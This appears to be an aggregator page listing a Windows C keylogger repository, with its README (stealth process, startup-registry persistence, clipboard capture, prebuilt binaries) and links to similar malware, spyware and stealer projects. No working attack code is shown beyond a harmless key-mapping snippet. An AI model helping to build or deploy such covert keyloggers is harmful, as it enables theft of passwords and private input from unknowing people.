All Projects → vim2meta → Keylogger

vim2meta / Keylogger

Licence: mit
A powerful C keylogger for Windows.

Programming Languages

c
50402 projects - #5 most used programming language

Projects that are alternatives of or similar to Keylogger

ToxicEye
👽 Program for remote control of windows computers via telegram bot. Written in C#
Stars: ✭ 305 (+242.7%)
Mutual labels:  malware, keylogger
ph-malhide
Process Hacker 2 hiding from external applications
Stars: ✭ 17 (-80.9%)
Mutual labels:  winapi, malware
Python-Keylogger
Python Tutorial - || Advanced Keylogger || Code Walk-through || Hacking/Info-Sec ||
Stars: ✭ 55 (-38.2%)
Mutual labels:  malware, keylogger
Archivist
A ctypes powered python keylogger.
Stars: ✭ 92 (+3.37%)
Mutual labels:  malware, keylogger
Trojancockroach
A Stealthy Trojan Spyware
Stars: ✭ 424 (+376.4%)
Mutual labels:  malware, keylogger
Malware
Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools
Stars: ✭ 156 (+75.28%)
Mutual labels:  malware, keylogger
claw
Source code of Claw Key logger previously sold on HackForums
Stars: ✭ 33 (-62.92%)
Mutual labels:  malware, keylogger
Inferno
🔥 Modern command line tool for malware creation on Windows
Stars: ✭ 105 (+17.98%)
Mutual labels:  malware, keylogger
Richkware
Framework for building Windows malware, written in C++
Stars: ✭ 315 (+253.93%)
Mutual labels:  malware, keylogger
KeyPlexer
Capstone: Keylogger Trojan
Stars: ✭ 32 (-64.04%)
Mutual labels:  malware, keylogger
Spyware
Python-based spyware for Windows that logs the foreground window activites, keyboard inputs. Furthermore it is able to take screenshots and and run shell commands in the background.
Stars: ✭ 31 (-65.17%)
Mutual labels:  malware, keylogger
Spytrojan keylogger
[Solo para programadores] Troyano espía | Keylogger solo para Windows, se replica en el sistema y se inicia automaticamente al iniciar sesión. | Envío de registro mediante [Base de Datos], [Gmail] o [BotTelegram].
Stars: ✭ 32 (-64.04%)
Mutual labels:  malware, keylogger
Malware-with-Backdoor-and-Keylogger
👨🏻‍💻 A great tool for Ethical Hackers, a malware programmed with Backdoor and Keylogger.
Stars: ✭ 25 (-71.91%)
Mutual labels:  malware, keylogger
Gobot2
Second Version of The GoBot Botnet, But more advanced.
Stars: ✭ 431 (+384.27%)
Mutual labels:  malware, keylogger
Cyberweapons
Automated Cyber Offense
Stars: ✭ 64 (-28.09%)
Mutual labels:  malware, keylogger
Ursadb
Trigram database written in C++, suited for malware indexing
Stars: ✭ 72 (-19.1%)
Mutual labels:  malware
Teleshadow3
Telegram Desktop Session Stealer
Stars: ✭ 83 (-6.74%)
Mutual labels:  malware
Malware Feed
Bringing you the best of the worst files on the Internet.
Stars: ✭ 69 (-22.47%)
Mutual labels:  malware
Saydog Framework
Saydog Framework
Stars: ✭ 71 (-20.22%)
Mutual labels:  malware
Sinkholes
🐛 Malware Sinkhole List in various formats
Stars: ✭ 84 (-5.62%)
Mutual labels:  malware
Build Status Codacy Badge License Release

Features

  • Stealthy process
  • Automatically added to startup registry
  • Keyboard locale support
  • Special characters and numeric keypad
  • Clipboard parsing on Ctrl + V
  • Supports Windows XP, Vista, 8 and 10

Configuration

You may configure the name of the logging file in the config.h file as well as what should be logged for each virtual-key code by modifying the keylogger.c file.

LPCWSTR get_virtual_key_value(DWORD vk_code) 
{
	switch (vk_code) {
	case VK_RETURN:
		return L"\r\n";
	case VK_ESCAPE:
		return L"[ESC]";
	case VK_BACK:
		return L"[BACKSPACE]";
	default:
		return NULL;
	}
}

Build

Visual Studio 2017 is required to load the solution. However, the project may be compiled by any Windows C11 compiler. The only required Windows library is Kernel32.lib. All other library functions are dynamically imported with LoadLibrary.

If you do not wish to build the project yourself, you may use the prebuilt binaries available here: https://github.com/vim2meta/Keylogger/releases.

Contributing

All contributions are welcome. If you are going to submit a pull request, please follow the style of the project and aim for clear and concise code.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].